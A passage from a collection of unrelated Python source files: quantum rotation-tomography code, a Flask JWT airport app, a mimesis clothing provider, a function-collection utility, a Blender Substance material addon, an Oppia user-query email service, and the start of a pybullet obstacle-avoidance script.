            [1.0, -0.5, +np.sqrt(3.0)/2.0,],
            ], dtype=float)  # bug fix: np.float alias removed in NumPy 1.24
        T = np.copy(T1)
        for D2 in range(1,D):
            T = np.kron(T, T1)
        T *= 0.5**D
        return T

    @staticmethod
    def quad_transfer_inv(D=1):
        """Inverse transfer matrix: quadrature values to basis coefficients."""
        T1inv = np.array([
            [ 1.0, 1.0, 1.0,],
            [ -1.0, 2.0, -1.0,],
            [-np.sqrt(3.0), 0.0, +np.sqrt(3.0),],
            ], dtype=float) / 3.0  # bug fix: np.float alias removed in NumPy 1.24
        Tinv = np.copy(T1inv)
        for D2 in range(1,D):
            Tinv = np.kron(Tinv, T1inv)
        return Tinv

    @staticmethod
    def quad_coefs(O):
        """Fit basis coefficients from values O sampled on the quad_x grid."""
        return np.reshape(np.dot(RotationTomography.quad_transfer_inv(D=O.ndim), O.ravel()), O.shape)

    # => Optimization <= #

    def optimize_jacobi_1(
        self,
        theta0=None,
        n=100,
        d=0,
        ):
        """One-parameter-at-a-time (Jacobi) minimization sweep.

        Each step minimizes over parameter k exactly (via arctan2) while the
        other parameters are held fixed; k cycles through the parameters
        starting at offset d.

        Returns:
            np.ndarray of shape (nparam, n + 1) - the iterate history.
        """
        if theta0 is None:
            theta0 = np.zeros((self.nparam,))
        theta = np.copy(theta0)
        thetas = [theta0]
        for iteration in range(n):
            k = (iteration + d) % self.nparam
            # All parameters except k, shaped (nparam - 1, 1) for evaluation.
            # (Loop variable renamed: the original shadowed `theta` inside the
            # comprehension.)
            theta_2 = np.array([t for k2, t in enumerate(theta) if k2 != k])
            theta_2 = np.reshape(theta_2, theta_2.shape + (1,))
            coefs_b = np.take(self.coefs, 1, k)
            coefs_c = np.take(self.coefs, 2, k)
            tomography_b = RotationTomography(coefs_b)
            tomography_c = RotationTomography(coefs_c)
            Ob = tomography_b.compute_observable_expectation_value(theta_2)
            Oc = tomography_c.compute_observable_expectation_value(theta_2)
            # Exact minimizer of Ob*cos(2x) + Oc*sin(2x) in x = theta_k
            theta[k] = 0.5 * np.arctan2(-Oc, -Ob)
            thetas.append(np.copy(theta))
        thetas = np.array(thetas)
        return thetas.T

    def optimize_jacobi_1_best(
        self,
        theta0=None,
        n=100,
        ):
        """Run a Jacobi sweep from each parameter offset and keep the sweep
        whose final iterate yields the lowest <O>."""
        thetas = []
        for d in range(self.nparam):
            thetas.append(self.optimize_jacobi_1(
                theta0=theta0,
                n=n,
                d=d,
                ))
        Os = np.array([self.compute_observable_expectation_value(theta2[:,-2:-1]) for theta2 in thetas])
        return thetas[np.argmin(Os)]

    def optimize(self):
        """Return the parameter vector minimizing <O> (best Jacobi sweep)."""
        return self.optimize_jacobi_1_best()[:,-1]
def run_observable_expectation_value_tomography(
    backend,
    circuit,
    pauli,
    nmeasurement=None,
    param_indices=None,
    **kwargs):
    """Fit and return a RotationTomography of <pauli> over selected circuit
    parameters.

    Evaluates the pauli expectation value on the 3**len(param_indices)-point
    quadrature grid and fits the {1, cos, sin} product-basis coefficients.
    Only Rx/Ry/Rz parameters have a known tomography rule.
    """
    # No dropthrough - always need quasar.Circuit to manipulate
    circuit = build_quasar_circuit(circuit).copy()
    param_values = circuit.param_values
    # Default to doing tomography over all parameters (NOTE: This costs 3**nparam pauli expectation values)
    if param_indices is None:
        param_indices = tuple(range(circuit.nparam))
    # Check that the tomography formula is known for these parameters (i.e., Rx, Ry, Rz gates)
    param_keys = circuit.param_keys
    for param_index in param_indices:
        key = param_keys[param_index]
        time, qubits, name = key
        gate = circuit.gates[(time, qubits)]
        if not gate.name in ('Rx', 'Ry', 'Rz'):
            raise RuntimeError('Unknown tomography rule: presently can only tomography Rx, Ry, Rz gates: %s' % gate)
    # The tomography quadrature grid
    T = RotationTomography.quad_x(len(param_indices))
    O = np.zeros_like(T[0])
    npoint = T.size // T.shape[0]
    for I in range(npoint):
        # Evaluate <pauli> with the selected parameters set to the I-th
        # quadrature point (other parameters keep their original values).
        param_values2 = param_values.copy()
        for param_index, T2 in zip(param_indices, T):
            param_values2[param_index] = T2.ravel()[I]
        circuit.set_param_values(param_values2)
        O.ravel()[I] = run_pauli_expectation(backend, circuit, pauli, nmeasurement, **kwargs).dot(pauli).real # TODO: do we need this to be real
    # Tomography fitting
    coefs = RotationTomography.quad_coefs(O)
    # Finished RotationTomography object
    return RotationTomography(coefs=coefs)
def run_ensemble_observable_expectation_value_tomography(
    backend,
    reference_circuits,
    reference_weights,
    circuit,
    pauli,
    nmeasurement=None,
    param_indices=None,
    **kwargs):
    """Ensemble variant of run_observable_expectation_value_tomography.

    At each quadrature point the observable is the weighted sum of <pauli>
    over `reference_circuits` (each prepended to `circuit`), weighted by
    `reference_weights`.
    """
    # No dropthrough - always need quasar.Circuit to manipulate
    reference_circuits = [build_quasar_circuit(_) for _ in reference_circuits]
    circuit = build_quasar_circuit(circuit).copy()
    param_values = circuit.param_values
    # Default to doing tomography over all parameters (NOTE: This costs 3**nparam pauli expectation values)
    if param_indices is None:
        param_indices = tuple(range(circuit.nparam))
    # Check that the tomography formula is known for these parameters (i.e., Rx, Ry, Rz gates)
    param_keys = circuit.param_keys
    for param_index in param_indices:
        key = param_keys[param_index]
        time, qubits, name = key
        gate = circuit.gates[(time, qubits)]
        if not gate.name in ('Rx', 'Ry', 'Rz'):
            raise RuntimeError('Unknown tomography rule: presently can only tomography Rx, Ry, Rz gates: %s' % gate)
    # The tomography quadrature grid
    T = RotationTomography.quad_x(len(param_indices))
    O = np.zeros_like(T[0])
    npoint = T.size // T.shape[0]
    for I in range(npoint):
        param_values2 = param_values.copy()
        for param_index, T2 in zip(param_indices, T):
            param_values2[param_index] = T2.ravel()[I]
        circuit.set_param_values(param_values2)
        # Weighted ensemble average over the reference state preparations
        Oval = 0.0
        for ref, w in zip(reference_circuits, reference_weights):
            circuit2 = Circuit.concatenate([ref, circuit])
            Oval += w * run_pauli_expectation(backend, circuit2, pauli, nmeasurement, **kwargs).dot(pauli).real # TODO: do we need this to be real
        O.ravel()[I] = Oval
    # Tomography fitting
    coefs = RotationTomography.quad_coefs(O)
    # Finished RotationTomography object
    return RotationTomography(coefs=coefs)
|
from datetime import datetime, timedelta
from flask import Flask
from flask_cors import CORS
from flask_jwt_simple import JWTManager
from uranus_middleware.auth_utils import JWT_SECRET_KEY
from uranus_middleware.endpoints import init_app
from uranus_middleware.resources import (
airport, auth, boarding_pass, check_in, flight, health, infomation, luggage, passenger, password, user
)
app = Flask(__name__)
# Secret used to sign JWTs; imported from auth_utils.
app.config['JWT_SECRET_KEY'] = JWT_SECRET_KEY
# Tokens expire 30 days after issuance (used in the `exp` claim below).
JWT_EXPIRES = timedelta(days=30)
jwt = JWTManager(app)
@jwt.jwt_data_loader
def add_claims_to_access_token(user):
    """Build the JWT payload (claims) for *user*."""
    issued_at = datetime.utcnow()
    claims = {
        'iss': 'uranus',
        'exp': issued_at + JWT_EXPIRES,
        'iat': issued_at,
        'role': user['role'],
        'identifier': user['id']
    }
    return claims
# Register every resource blueprint on the app.
app.register_blueprint(health.health_blueprint)
app.register_blueprint(user.user_blueprint)
app.register_blueprint(auth.auth_blueprint)
app.register_blueprint(airport.airport_blueprint)
app.register_blueprint(flight.flight_blueprint)
app.register_blueprint(passenger.passenger_blueprint)
app.register_blueprint(password.password_blueprint)
# NOTE: 'infomation' [sic] mirrors the imported module's actual spelling.
app.register_blueprint(infomation.info_blueprint)
app.register_blueprint(check_in.checkin_blueprint)
app.register_blueprint(luggage.luggage_blueprint)
app.register_blueprint(boarding_pass.boarding_pass_blueprint)
# Enable CORS for the whole app, then let the endpoints package finish setup.
CORS(app)
init_app(app)
if __name__ == '__main__':
    # Serve via gevent with websocket support instead of the Flask dev server.
    from gevent import pywsgi
    from geventwebsocket.handler import WebSocketHandler
    server = pywsgi.WSGIServer(('', 5000), app, handler_class=WebSocketHandler)
    server.serve_forever()
|
# -*- coding: utf-8 -*-
"""Clothing data provider."""
from mimesis.providers.base import BaseProvider
__all__ = ['Clothing']
class Clothing(BaseProvider):
    """Provider of clothing-related data (sizes)."""

    class Meta:
        """Provider metadata."""

        name = 'clothing'

    def international_size(self) -> str:
        """Get a random size in international format.

        :return: Clothing size.
        """
        sizes = ['L', 'M', 'S', 'XL',
                 'XS', 'XXL', 'XXS', 'XXXL']
        return self.random.choice(sizes)

    def european_size(self) -> int:
        """Generate a random clothing size in European format.

        :return: Clothing size.
        """
        return self.random.randint(38, 62)

    def custom_size(self, minimum: int = 40, maximum: int = 62) -> int:
        """Generate clothing size using custom format.

        :param minimum: Minimum value.
        :param maximum: Maximum value.
        :return: Clothing size.
        """
        return self.random.randint(minimum, maximum)
|
import traceback
class FunctionCollection:
    """An ordered, prioritized collection of zero-argument functions.

    Functions are registered via :meth:`append` or by using the instance as a
    decorator (with or without keyword arguments), and are run together with
    :meth:`run` / :meth:`execute` in ascending priority order.

    Args:
        on_error: function, launched when function in collection raises an
            exception
        on_error_kwargs: additional kwargs for on_error function
        include_exceptions: include exceptions into final result dict
    """

    def __init__(self, **kwargs):
        self._functions = []
        self._functions_with_priorities = []
        self.on_error = kwargs.get('on_error')
        self.on_error_kwargs = kwargs.get('on_error_kwargs', {})
        self.include_exceptions = bool(kwargs.get('include_exceptions'))
        self.default_priority = 100

    def __call__(self, f=None, **kwargs):
        """Decorator / shortcut entry point.

        * ``@collection`` registers ``f`` directly.
        * ``@collection(priority=N)`` returns a decorator that registers the
          function with the given kwargs. Bug fix: the inner wrapper now
          returns the decorated function — previously it returned ``None``,
          so the decorated name was clobbered.
        * ``collection()`` with no arguments runs the collection.
        """
        def wrapper(func):
            self.append(func, **kwargs)
            return func
        if f is not None:
            # Plain-decorator form; any kwargs are ignored (as before).
            self.append(f)
            return f
        elif kwargs:
            return wrapper
        else:
            return self.run()

    def append(self, f, priority=None):
        """
        Append function without annotation

        Args:
            f: function
            priority: function priority (falsy values, including 0, fall back
                to ``default_priority`` — preserved for compatibility)
        """
        if f not in self._functions:
            self._functions.append(f)
            self._functions_with_priorities.append({
                'p': priority if priority else self.default_priority,
                'f': f
            })

    def remove(self, f):
        """
        Remove function

        Args:
            f: function
        """
        try:
            self._functions.remove(f)
            for z in self._functions_with_priorities:
                if z['f'] is f:
                    self._functions_with_priorities.remove(z)
                    break
        except ValueError:
            # Narrowed from a bare ``except``: list.remove raises ValueError
            # when the function was never registered.
            self.error()

    def run(self):
        """
        Run all functions in collection

        Returns:
            result dict as
            { '<function>': '<function_return>', ... }
        """
        return self.execute()[0]

    def execute(self):
        """
        Run all functions in collection

        Returns:
            a tuple
            { '<function>': '<function_return>', ...}, ALL_OK
            where ALL_OK is True if no function raised an exception
        """
        result = {}
        all_ok = True
        # Ascending priority; sort is stable, so equal priorities keep
        # registration order.
        funclist = sorted(self._functions_with_priorities, key=lambda k: k['p'])
        for fn in funclist:
            f = fn['f']
            k = '{}.{}'.format(f.__module__, f.__name__)
            try:
                result[k] = f()
            except Exception as e:
                if self.include_exceptions:
                    result[k] = (e, traceback.format_exc())
                else:
                    result[k] = None
                self.error()
                all_ok = False
        return result, all_ok

    def error(self):
        """Invoke ``on_error`` if configured; otherwise re-raise the active
        exception (a bare ``raise`` outside an except block raises
        RuntimeError)."""
        if self.on_error:
            self.on_error(**self.on_error_kwargs)
        else:
            raise
|
"""
Copyright (C) 2021 Adobe.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# Substance Node Graph
# 02/23/2021
import bpy
import bmesh
from mathutils import Vector
import os
# UI layout parameters
# Node-editor coordinate offsets used when laying out the generated shader
# nodes (negative X places a node to the left of its neighbor).
UI_DispNodeYPos = -350
UI_TextureYPosIncrement = -275
UI_TextureXPosOffset = -575
UI_NormalNodeXPosOffset = -250
UI_TexCoordXOffset = -200
UI_MappingXPosOffset = 400
UI_InputNodeXPosOffset = -1000
UI_InputNodeYPosOffset = -200
UI_MappingWidth = 240
UI_ReroutingXPosOffset = -675
UI_ValueNodeYOffset = 150
UI_ValueNodeYIncrement = 200
UI_SBSAR_OutputXOffset = 200
UI_NODEGROUP_XOffset = 300
# UI Socket Name
UV_SOCKET_NAME = 'UV'
def GetPropertyClassKeywordAttribute(propertyClass, attribute):
    """ Get the keyword attribute from the property class """
    # Blender 2.93+ exposes property definitions via a `keywords` mapping;
    # earlier versions stored them as a (callable, kwargs) tuple.
    modern = hasattr(propertyClass, 'keywords')
    if modern:
        return propertyClass.keywords[attribute]
    return propertyClass[1][attribute]
class SbsarOutputLink():
    """ The data needed to create/destroy an output link """
    def __init__(self, to, fr):
        """ Initialize the data

        Args:
            to: destination (input) socket of the link
            fr: source (output) socket of the link
        """
        self.toSocket = to
        self.fromSocket = fr
        self.link = None       # live blender link object, once created
        self.enabled = False   # whether the link currently exists in the UI
    def addLink(self, links):
        """ Add a blender UI link """
        try:
            self.link = links.new(self.fromSocket, self.toSocket)
            self.enabled = True
        except Exception as e:
            # Bug fix: corrected typo in error message ('Faled' -> 'Failed')
            print('Failed to add link: ' + str(e))
    def removeLink(self, links):
        """ Remove a blender UI Link """
        try:
            if self.link:
                links.remove(self.link)
            self.enabled = False
        except Exception as e:
            print('Failed to remove link: ' + str(e))
def CreateMaterial(paramManager, sbsarData, context, texture_preference_map, obj):
    """ Create a blender material from the sbsar data

    Builds a node group containing the SBSAR texture/value outputs, attaches
    it to a new Principled BSDF material on `obj`, and wires the UV mapping
    plus the group-to-shader output links.

    Returns:
        The new material, or None when a mapped texture file is missing or no
        texture nodes were produced.
    """
    if obj is None:
        print('Loading an SBSAR requires an object in scene in order to create the blender material')
        return
    # Replace any previous material generated for this SBSAR.
    # Bug fix: was bpy.data.materials.get('sbsarData.name') — a string
    # literal — so the stale material with the real name was never found
    # and removed.
    mat = bpy.data.materials.get(sbsarData.name)
    if mat is not None:
        bpy.data.materials.remove(mat)
    mat = bpy.data.materials.new(name=sbsarData.name)
    mat.use_nodes = True
    nodes = mat.node_tree.nodes
    links = mat.node_tree.links
    bsdf = nodes['Principled BSDF']
    shaderPos = bsdf.location
    # create substance node group
    sbsar_name = sbsarData.name
    substanceNodeGroup = bpy.data.node_groups.new(type='ShaderNodeTree', name=sbsar_name)
    substanceNodes = substanceNodeGroup.nodes
    # setup group output node
    output_node = substanceNodes.new('NodeGroupOutput')
    output_node.location = (UI_SBSAR_OutputXOffset, 0)
    # cache the newly created nodes to create the proper UI mappings
    newTexNodes = []
    newValNodes = []
    textureIndex = 0
    for blender_texture_prop in texture_preference_map.__annotations__:
        blendTexProp = texture_preference_map.__annotations__[blender_texture_prop]
        prop_name = GetPropertyClassKeywordAttribute(blendTexProp, 'name')
        # Create Blender nodes from the SBSAR output data
        if prop_name in sbsarData.mapped_outputs.keys():
            texPath, output_value, id = sbsarData.mapped_outputs[prop_name]
            # Load the mapped texture
            if len(texPath) > 0:
                if os.path.exists(texPath):
                    texNode = substanceNodes.new('ShaderNodeTexImage')
                    # the node name is in two parts the first is used for relinking upon loading a blend file
                    # the second part of the name is the property ID, used when receiving updates from the Tools
                    texNode.name = sbsarData.id + '.' + str(id)
                    texNode.image = bpy.data.images.load(texPath)
                    texNode.label = prop_name
                    yPos = shaderPos[1] + (textureIndex * UI_TextureYPosIncrement)
                    texNode.location = Vector((UI_TextureXPosOffset, yPos))
                    # setup normal node
                    if prop_name == 'Normal' or prop_name == 'Clearcoat Normal':
                        normalNode = substanceNodes.new(type='ShaderNodeNormalMap')
                        substanceNodeGroup.outputs.new('NodeSocketVector', prop_name)
                        substanceNodeGroup.links.new(normalNode.inputs[1], texNode.outputs[0])
                        normalNode.location = Vector((UI_NormalNodeXPosOffset, yPos))
                        substanceNodeGroup.links.new(normalNode.outputs[0], output_node.inputs[texNode.label])
                    # setup displacement node
                    elif prop_name == 'Displacement':
                        dispNode = nodes.new(type='ShaderNodeDisplacement')
                        dispNode.name = 'SBSARDispNode'
                        dispNode.inputs['Scale'].default_value = texture_preference_map.displacementScale
                        substanceNodeGroup.outputs.new('NodeSocketVector', 'Height')
                        substanceNodeGroup.links.new(texNode.outputs[0], output_node.inputs['Height'])
                        dispNode.location = Vector((bsdf.location[0], UI_DispNodeYPos))
                        links.new(dispNode.outputs['Displacement'], nodes['Material Output'].inputs['Displacement'])
                    # setup all other output nodes
                    else:
                        substanceNodeGroup.outputs.new('NodeSocketColor', prop_name)
                        substanceNodeGroup.links.new(texNode.outputs['Color'], output_node.inputs[texNode.label])
                    SetTexNodeColorSpace(texNode)
                    sbsarData.textureNodes.append(texNode)
                    newTexNodes.append(texNode)
                    textureIndex += 1
                else:
                    print('Texture does not exist: ' + texPath)
                    return None
            # Load the value output
            elif output_value is not None:
                valueNode = substanceNodes.new('ShaderNodeValue')
                valueNode.name = str(id)
                valueNode.label = prop_name
                valueNode.outputs[0].default_value = output_value
                substanceNodeGroup.outputs.new('NodeSocketFloat', prop_name)
                substanceNodeGroup.links.new(valueNode.outputs['Value'], output_node.inputs[valueNode.label])
                sbsarData.valueNodes.append(valueNode)
                newValNodes.append(valueNode)
            else:
                print('No Outputs for Prop: ' + prop_name)
    # add the newly created blender material to the object
    if len(newTexNodes) > 0:
        # add the material to the object
        obj.data.materials.append(mat)
        # set the active material index to the newly created material
        obj.active_material_index = len(obj.data.materials) - 1
        if bpy.context.object is None:
            context.view_layer.objects.active = obj
            obj.select_set(True)
        # apply material to all faces which must be done in 'EDIT' Mode
        currentMode = bpy.context.object.mode
        bpy.ops.object.mode_set(mode='EDIT')
        bm = bmesh.from_edit_mesh(obj.data)
        for face in bm.faces:
            face.material_index = obj.active_material_index
        bpy.ops.object.mode_set(mode=currentMode)
        # build the Material level group node
        group_node = nodes.new('ShaderNodeGroup')
        group_node.name = sbsar_name + '_sbsar_group'
        group_node.node_tree = substanceNodeGroup
        group_node.location = (shaderPos[0] - UI_NODEGROUP_XOffset, shaderPos[1])
        group_node.select = True
        nodes.active = group_node
        # link up the graph
        DrawMappingUI(context, substanceNodeGroup, bsdf.location[0], shaderPos[1], newTexNodes, newValNodes)
        CreateUVMapping(mat, group_node, newTexNodes)
        # setup the group outputs and map to the Shader
        for output in group_node.outputs:
            enabled = True
            linkName = output.name
            if output.name in sbsarData.outputLinks:
                enabled = sbsarData.outputLinks[output.name].enabled
            if output.name == 'Height':
                # 'Height' exists only when the Displacement branch above ran,
                # so dispNode is guaranteed to be bound here.
                toNode = dispNode.inputs['Height']
                linkName = 'Displacement'
            else:
                toNode = bsdf.inputs[output.name]
            oLink = SbsarOutputLink(toNode, output)
            if enabled:
                oLink.addLink(links)
            sbsarData.outputLinks[linkName] = oLink
        return mat
    return None
def CreateUVMapping(mat, groupNode, texNodes):
    """ Create a the blender UV Mapping nodes

    Adds a TexCoord -> Mapping chain in the material, exposes a 'UV' vector
    input on the substance group node, and feeds it to every texture node
    inside the group.
    """
    # create the input node for the substance group if needed
    groupInputNode = groupNode.node_tree.nodes.get('NodeGroupInput', None)
    if not groupInputNode:
        groupInputNode = groupNode.node_tree.nodes.new('NodeGroupInput')
        groupInputNode.location = Vector((UI_InputNodeXPosOffset, UI_InputNodeYPosOffset))
    nodes = mat.node_tree.nodes
    links = mat.node_tree.links
    # Create the Mapping Node
    mapping = nodes.new(type='ShaderNodeMapping')
    mapping.location = Vector((groupNode.location[0] - UI_MappingXPosOffset, groupNode.location[1]))
    mapping.width = UI_MappingWidth
    # Create the UV Texture Coordinate node
    textureInput = nodes.new(type='ShaderNodeTexCoord')
    textureInput.location = mapping.location + Vector((UI_TexCoordXOffset, 0))
    # Link the nodes (TexCoord output index 2 feeds the Mapping vector input)
    links.new(mapping.inputs[0], textureInput.outputs[2])
    # Create frame around Mapping and TexCoord
    frame = nodes.new(type='NodeFrame')
    frame.label = 'Mapping'
    mapping.parent = frame
    textureInput.parent = frame
    frame.update()
    # create the input socket to the substance node and connect
    groupNode.inputs.new('NodeSocketVector', UV_SOCKET_NAME)
    links.new(groupNode.inputs[UV_SOCKET_NAME], mapping.outputs[0])
    # link the UV mapping to all the texture nodes
    for texNode in texNodes:
        groupNode.node_tree.links.new(texNode.inputs['Vector'], groupInputNode.outputs[UV_SOCKET_NAME])
def DrawMappingUI(context, node_tree, xpos, ypos, newTexNodes, newValNodes):
    """ Configure the graph for the substance group node

    Frames the generated texture nodes and stacks the value nodes beneath
    them (or beneath `ypos` when there are no textures).
    """
    nodes = node_tree.nodes
    # Create frame around texture nodes
    texFrame = None
    if len(newTexNodes) > 0:
        texFrame = nodes.new(type='NodeFrame')
        texFrame.label = 'Textures'
        for tnode in newTexNodes:
            tnode.parent = texFrame
        texFrame.update()
    # place the value nodes together above the textures
    if len(newValNodes) > 0:
        valueFrame = nodes.new(type='NodeFrame')
        valueFrame.label = 'Values'
        # Bug fix: texFrame only exists when textures were created; fall back
        # to the caller-supplied ypos so value-only materials don't raise
        # NameError.
        anchorY = texFrame.location[1] if texFrame is not None else ypos
        yPos = anchorY - UI_ValueNodeYOffset
        for vNode in newValNodes:
            vNode.location = Vector((UI_TextureXPosOffset, yPos))
            yPos -= UI_ValueNodeYIncrement
            vNode.parent = valueFrame
        valueFrame.update()
    return {'FINISHED'}
def SetTexNodeColorSpace(texNode):
    """ set Base Color to sRGB and all others to Non-Color """
    target = 'sRGB' if texNode.label == 'Base Color' else 'Non-Color'
    try:
        texNode.image.colorspace_settings.name = target
    except Exception:
        print('Non-Standard Color Space Detected -- Please manually select')
|
# coding: utf-8
#
# Copyright 2016 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain object for a parameters of a query."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.domain import email_manager
from core.domain import user_query_domain
from core.platform import models
(user_models,) = models.Registry.import_models([models.NAMES.user])
def _get_user_query_from_model(user_query_model):
    """Transform user query model to domain object.

    Args:
        user_query_model: UserQueryModel. The model to be converted.

    Returns:
        UserQuery. User query domain object.
    """
    # Bundle the filter predicate fields into the immutable params object.
    user_query_params = user_query_domain.UserQueryParams(
        user_query_model.inactive_in_last_n_days,
        user_query_model.has_not_logged_in_for_n_days,
        user_query_model.created_at_least_n_exps,
        user_query_model.created_fewer_than_n_exps,
        user_query_model.edited_at_least_n_exps,
        user_query_model.edited_fewer_than_n_exps
    )
    return user_query_domain.UserQuery(
        user_query_model.id,
        user_query_params,
        user_query_model.submitter_id,
        user_query_model.query_status,
        user_query_model.user_ids,
        user_query_model.sent_email_model_id,
        user_query_model.created_on,
        user_query_model.deleted,
    )
def get_user_query(query_id, strict=False):
    """Gets the user query with some ID.

    Args:
        query_id: str. The ID of the query.
        strict: bool. Whether to raise an error if the user query doesn't exist.

    Returns:
        UserQuery|None. The user query, or None when it does not exist and
        strict is False.
    """
    user_query_model = user_models.UserQueryModel.get(query_id, strict=strict)
    if not user_query_model:
        return None
    return _get_user_query_from_model(user_query_model)
def get_recent_user_queries(num_queries_to_fetch, cursor):
    """Get recent user queries.

    Args:
        num_queries_to_fetch: int. Number of user queries to fetch.
        cursor: str|None. The list of returned entities starts from this
            datastore cursor. Can be None if there are no more entities.

    Returns:
        tuple(list(UserQuery), str). The fetched user query domain objects and
        the cursor to pass to the next page fetch.
    """
    models_page, next_cursor, _ = user_models.UserQueryModel.fetch_page(
        num_queries_to_fetch, cursor)
    user_queries = [_get_user_query_from_model(m) for m in models_page]
    return (user_queries, next_cursor)
def _save_user_query(user_query):
    """Save the user query into the datastore.

    Args:
        user_query: UserQuery. The user query to save.

    Returns:
        str. The ID of the user query that was saved.
    """
    user_query.validate()
    # Note: the domain object's `status` attribute maps onto the model's
    # `query_status` field.
    user_query_dict = {
        'inactive_in_last_n_days': user_query.params.inactive_in_last_n_days,
        'has_not_logged_in_for_n_days': (
            user_query.params.has_not_logged_in_for_n_days),
        'created_at_least_n_exps': user_query.params.created_at_least_n_exps,
        'created_fewer_than_n_exps': (
            user_query.params.created_fewer_than_n_exps),
        'edited_at_least_n_exps': user_query.params.edited_at_least_n_exps,
        'edited_fewer_than_n_exps': user_query.params.edited_fewer_than_n_exps,
        'submitter_id': user_query.submitter_id,
        'query_status': user_query.status,
        'user_ids': user_query.user_ids,
        'sent_email_model_id': user_query.sent_email_model_id,
        'deleted': user_query.deleted
    }
    # Update the existing model in place if one exists; otherwise create it.
    user_query_model = (
        user_models.UserQueryModel.get(user_query.id, strict=False))
    if user_query_model is not None:
        user_query_model.populate(**user_query_dict)
    else:
        user_query_dict['id'] = user_query.id
        user_query_model = user_models.UserQueryModel(**user_query_dict)
    user_query_model.put()
    return user_query_model.id
def save_new_user_query(
        submitter_id, inactive_in_last_n_days=None,
        has_not_logged_in_for_n_days=None, created_at_least_n_exps=None,
        created_fewer_than_n_exps=None, edited_at_least_n_exps=None,
        edited_fewer_than_n_exps=None):
    """Create and save a new user query with the given filter parameters.

    Args:
        submitter_id: str. ID of the user submitting the query.
        inactive_in_last_n_days: int|None. Number of days user is inactive.
        has_not_logged_in_for_n_days: int|None. Number of days user hasn't
            logged in.
        created_at_least_n_exps: int|None. Minimum number of explorations
            created by user.
        created_fewer_than_n_exps: int|None. Maximum number of explorations
            created by user.
        edited_at_least_n_exps: int|None. Minimum number of explorations
            edited by user.
        edited_fewer_than_n_exps: int|None. Maximum number of explorations
            edited by user.

    Returns:
        str. The ID of the newly saved user query.
    """
    query_params = user_query_domain.UserQueryParams(
        inactive_in_last_n_days=inactive_in_last_n_days,
        has_not_logged_in_for_n_days=has_not_logged_in_for_n_days,
        created_at_least_n_exps=created_at_least_n_exps,
        created_fewer_than_n_exps=created_fewer_than_n_exps,
        edited_at_least_n_exps=edited_at_least_n_exps,
        edited_fewer_than_n_exps=edited_fewer_than_n_exps
    )
    new_query_id = user_models.UserQueryModel.get_new_id('')
    new_user_query = user_query_domain.UserQuery.create_default(
        new_query_id, query_params, submitter_id)
    return _save_user_query(new_user_query)
def archive_user_query(user_query_id):
    """Mark the user query as archived and persist the change.

    Args:
        user_query_id: str. The ID of the user query to archive.
    """
    query_to_archive = get_user_query(user_query_id, strict=True)
    query_to_archive.archive()
    _save_user_query(query_to_archive)
def send_email_to_qualified_users(
        query_id, email_subject, email_body, email_intent, max_recipients):
    """Send an email to at most ``max_recipients`` users matched by a query,
    then archive the query and record the bulk email for every recipient.

    Args:
        query_id: str. ID of the UserQueryModel instance.
        email_subject: str. Subject of the email to be sent.
        email_body: str. Body of the email to be sent.
        email_intent: str. Intent of the email.
        max_recipients: int. Maximum number of recipients to send emails to;
            falsy values mean no cap.
    """
    user_query = get_user_query(query_id, strict=True)
    qualified_user_ids = user_query.user_ids
    if max_recipients:
        qualified_user_ids = qualified_user_ids[:max_recipients]
    sent_email_id = email_manager.send_user_query_email(
        user_query.submitter_id, qualified_user_ids, email_subject,
        email_body, email_intent
    )
    user_query.archive(sent_email_model_id=sent_email_id)
    _save_user_query(user_query)
    # Record the BulkEmailModel id against each recipient, creating the
    # per-user UserBulkEmailsModel on first use.
    for user_id in qualified_user_ids:
        bulk_emails_model = user_models.UserBulkEmailsModel.get(
            user_id, strict=False)
        if bulk_emails_model is None:
            bulk_emails_model = user_models.UserBulkEmailsModel(
                id=user_id, sent_email_model_ids=[])
        bulk_emails_model.sent_email_model_ids.append(sent_email_id)
        bulk_emails_model.put()
|
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
print ("current_dir=" + currentdir)
parentdir = os.path.join(currentdir,"../gym")
os.sys.path.insert(0,parentdir)
import pybullet as p
import pybullet_data
import time
import csv
#########---------------START Obstacle Avoidance----------########
import math
import numpy as np
import random
import matplotlib.pyplot as plt
class __Path:
    """Accumulates path statistics: total distance travelled (``len``) and
    straight-line distance from the start position (``rad``)."""

    def __init__(self):
        self.len = 0       # cumulative distance travelled
        self.curr = None   # last recorded position
        self.rad = 0       # radial distance from the start position

    def calcDist(self, pos):
        """Record position ``pos``; the first call fixes the start point."""
        if self.curr is None:
            self.start = pos
            self.curr = pos
        else:
            step = np.linalg.norm(pos - self.curr)
            self.curr = pos
            self.len = self.len + step
            self.rad = np.linalg.norm(pos - self.start)


class __Data:
    """State for the recursive widest-gap search over the ray-hit grid."""

    def __init__(self, row_i, start_i, end_i, n):
        self.row_i = row_i      # row index of each open interval
        self.start_i = start_i  # start column of each open interval
        self.end_i = end_i      # end column of each open interval
        self.n = n              # number of rows the gap must span
        self.gap = None         # widest (start, end) interval found so far

    def compareGap(self, s, f):
        """Return True when (s, f) is wider than the best gap so far."""
        best = self.gap
        return best is None or best[1] - best[0] < f - s

    def setGap(self, s, f):
        """Record (s, f) as the best gap when it beats the current one."""
        if self.compareGap(s, f):
            self.gap = (s, f)


def __addNextRow(row, start, finish, data):
    """Intersect (start, finish) with every open interval on ``row`` and
    recurse to the next row; intervals surviving all rows become gap
    candidates."""
    if row == data.n:
        data.setGap(start, finish)
        return
    for idx in np.argwhere(data.row_i == row):
        lo = data.start_i[idx][0]
        hi = data.end_i[idx][0]
        # Recurse only when the intervals actually overlap.
        if start < hi and finish > lo:
            clipped_lo = max(start, lo)
            clipped_hi = min(finish, hi)
